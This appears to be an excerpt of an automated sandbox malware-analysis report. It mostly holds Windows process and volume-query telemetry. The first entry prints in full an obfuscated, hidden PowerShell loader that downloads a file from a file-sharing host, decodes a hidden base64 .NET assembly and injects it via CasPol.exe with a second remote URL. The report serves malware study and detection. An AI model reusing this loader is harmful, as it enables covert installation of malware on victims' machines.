                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerd
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerO3\
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerO3\0
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, logs.dat.18.dr Binary or memory string: [Program Manager]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 18_2_00433E0A cpuid 18_2_00433E0A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoA,18_2_0040E679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,18_2_004470AE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,18_2_004510BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_004511E3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,18_2_004512EA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_004513B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,18_2_00447597
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,18_2_00450A7F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,18_2_00450CF7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,18_2_00450D42
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,18_2_00450DDD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,18_2_00450E6A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
